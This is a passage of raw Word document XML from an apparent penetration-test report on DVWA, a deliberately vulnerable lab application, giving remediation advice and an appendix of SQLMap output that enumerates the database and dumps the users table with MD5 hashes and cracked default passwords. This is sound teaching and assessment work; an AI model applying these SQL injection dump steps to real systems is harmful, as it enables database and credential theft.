        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP 5.5.9 has been end-of-life since July 2016 and contains numerous known vulnerabilities. MySQL on this instance is also outdated. Upgrade to currently supported versions of PHP (8.2+) and MySQL (8.0+).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.6 Do Not Store Passwords as Unsalted MD5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All five passwords were stored as unsalted MD5 hashes. SQLMap cracked all of them automatically using a dictionary attack. MD5 is cryptographically broken. Use bcrypt, Argon2, or PBKDF2 with a per-user salt for password storage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Appendix A: Complete SQLMap Output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All SQLMap commands executed during this assessment and their corresponding outputs are reproduced below for full reproducibility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="888888"/>
          <w:spacing w:val="40"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">COMMAND 1 — DATABASE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--dbs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available databases [4]:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] dvwa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] information_schema</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] mysql</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] performance_schema</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="888888"/>
          <w:spacing w:val="40"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">COMMAND 2 — TABLE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 dvwa --tables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[21:21:33] [INFO] retrieved: 2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:21:34] [INFO] retrieved: guestbook</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:21:42] [INFO] retrieved: users</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Database: dvwa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[2 tables]</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guestbook |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| users     |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">+-----------+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="888888"/>
          <w:spacing w:val="40"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">COMMAND 3 — COLUMN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 dvwa -T users --columns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[21:25:51] [INFO] retrieved: 8</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:25:52] [INFO] retrieved: user_id</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:26:00] [INFO] retrieved: int(6)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:26:07] [INFO] retrieved: first_name</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:26:16] [INFO] retrieved: varchar(15)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:26:28] [INFO] retrieved: last_name</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:26:37] [INFO] retrieved: varchar(15)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:26:48] [INFO] retrieved: user</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:26:52] [INFO] retrieved: varchar(15)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:27:04] [INFO] retrieved: password</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:27:11] [INFO] retrieved: varchar(32)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:27:22] [INFO] retrieved: avatar</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:27:29] [INFO] retrieved: varchar(70)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:27:40] [INFO] retrieved: last_login</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:27:49] [INFO] retrieved: timestamp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:27:58] [INFO] retrieved: failed_login</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:28:11] [INFO] retrieved: int(3)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Database: dvwa  Table: users  [8 columns]</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Column       | Type        |</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user         | varchar(15) |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| avatar       | varchar(70) |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| failed_login | int(3)      |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| first_name   | varchar(15) |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| last_login   | timestamp   |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| last_name    | varchar(15) |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| password     | varchar(32) |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| user_id      | int(6)      |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">+--------------+-------------+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="888888"/>
          <w:spacing w:val="40"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">COMMAND 4 — FULL DATA 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 dvwa -T users --dump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Database: dvwa  Table: users  [5 entries]</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user_id | user    | avatar                      | password                                    | last_name | first_name | last_login          | failed_login |</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3       | 1337    | /hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2018-10-03 22:09:36 | 0            |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| 1       | admin   | /hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2018-10-03 22:09:36 | 0            |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| 2       | gordonb | /hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2018-10-03 22:09:36 | 0            |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| 4       | pablo   | /hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2018-10-03 22:09:36 | 0            |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| 5       | smithy  | /hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2018-10-03 22:09:36 | 0            |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">+---------+---------+-----------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="888888"/>
          <w:spacing w:val="40"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">COMMAND 5 — TARGETED COLUMN DUMP (USER +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 dvwa -T users -C user,password --dump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Database: dvwa  Table: users  [5 entries]</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user    | password                                    |</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1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">+---------+---------------------------------------------+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="888888"/>
          <w:spacing w:val="40"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">COMMAND 6 — DUMP ALL USER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8"/>
              <w:bottom w:val="single" w:color="444444" w:sz="4"/>
              <w:right w:val="single" w:color="444444" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="1E1E2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
